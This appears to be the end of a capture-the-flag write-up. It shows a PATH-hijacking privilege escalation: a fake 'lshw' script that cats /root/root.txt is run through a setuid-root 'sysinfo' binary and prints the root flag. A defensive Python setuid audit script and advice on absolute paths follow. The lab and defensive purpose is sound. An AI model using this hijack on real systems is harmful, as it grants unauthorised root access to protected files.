bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 4000.00
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:

====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        835M        124M        6.7M        2.9G        2.7G
Swap:          947M        2.5M        944M
theseus@ubuntu:~$ /tmp/pspy64
2020/04/23 15:47:12 CMD: UID=0    PID=4330   | lshw -short
2020/04/23 15:47:12 CMD: UID=0    PID=4329   | sh -c lshw -short
2020/04/23 15:47:12 CMD: UID=0    PID=4328   | sysinfo
2020/04/23 15:47:19 CMD: UID=0    PID=4331   |
2020/04/23 15:47:19 CMD: UID=0    PID=4332   |
2020/04/23 15:47:19 CMD: UID=0    PID=4333   |
2020/04/23 15:47:19 CMD: UID=0    PID=4334   | sh -c fdisk -l
2020/04/23 15:47:19 CMD: UID=0    PID=4335   | fdisk -l

Ok, so it seems that sysinfo uses lshw to get information on devices. It doesn’t call it by its absolute path, so maybe we can exploit that.

If we create a script called lshw in /tmp and prepend that directory to our PATH, maybe we can read root.txt.

theseus@ubuntu:/tmp$ echo 'cat /root/root.txt' > lshw
theseus@ubuntu:/tmp$ chmod +x lshw
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
theseus@ubuntu:/tmp$ sysinfo
====================Hardware Info====================
c1d98a38edd0f0bceab347625c5ca59d

====================Disk Info====================
Disk /dev/loop0: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor	: 0
vendor_id	: AuthenticAMD
cpu family	: 23
model		: 1
model name	: AMD EPYC 7401P 24-Core Processor
stepping	: 2
microcode	: 0x8001230
cpu MHz		: 2000.000
cache size	: 512 KB
physical id	: 0
siblings	: 1
core id		: 0
cpu cores	: 1
apicid		: 0
initial apicid	: 0
fpu		: yes
fpu_exception	: yes
cpuid level	: 13
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs		: fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips	: 4000.00
TLB size	: 2560 4K pages
clflush size	: 64
cache_alignment	: 64
address sizes	: 43 bits physical, 48 bits virtual
power management:

====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        641M        1.7G        7.2M        1.5G        2.9G
Swap:          947M          0B        947M

Yes, we’ve retrieved root.txt at the beginning of the output: c1d98a38edd0f0bceab347625c5ca59d
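What made this box fall is a custom setuid-root binary that a stock install never ships. As an added example (not from the write-up), this Python audit parses the output of the same find command used above and reports every setuid file that is not in a package baseline, noting when it is runnable only by a particular group, as /bin/sysinfo is; the baseline and the sample lines are constructed for the example.

```python
import re

# One line of `find / -perm -4000 -type f -exec ls -la {} \;` output.
LS_RE = re.compile(
    r"^(?P<mode>[-rwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\w{3}\s+\d+\s+[\d:]+\s+(?P<path>/\S+)$"
)

# Constructed baseline of setuid files a stock Ubuntu 18.04 install ships. On a real
# host derive it from the package manager (dpkg -S / rpm -qf) rather than a hand list.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/bin/fusermount", "/usr/sbin/pppd", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}


def audit_suid(lines, baseline=BASELINE):
    """Return [(path, detail)] for setuid files outside the baseline. /snap/ paths are
    skipped: they live in read-only squashfs images and are reviewed with the snap."""
    findings = []
    for line in lines:
        m = LS_RE.match(line.strip())
        if m is None or m["path"].startswith("/snap/") or m["path"] in baseline:
            continue
        mode, owner, group = m["mode"], m["owner"], m["group"]
        detail = f"{mode} {owner}:{group}"
        if owner == "root" and mode[9] == "-":           # others cannot execute it
            detail += f" (setuid root, runnable only by group '{group}')"
        findings.append((m["path"], detail))
    return findings


# Sample lines constructed from the listing above (a subset, plus one non-matching line).
SAMPLE_LISTING = """
-rwsr-xr-- 1 root dip 382696 Feb 11 07:05 /usr/sbin/pppd
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Jan 31 09:18 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1223/bin/su
find: '/proc/1/task/1/fd': Permission denied
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
""".strip().splitlines()

if __name__ == "__main__":
    for path, detail in audit_suid(SAMPLE_LISTING):
        print(f"REVIEW {path}: {detail}")
```

A binary this check surfaces should then be inspected for what it executes; anything it runs by bare name, as sysinfo runs lshw and fdisk, needs an absolute path and a fixed PATH before the setuid bit can be justified.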

This was a great challenge, I’ve learned a lot of things, thanks a lot TRX!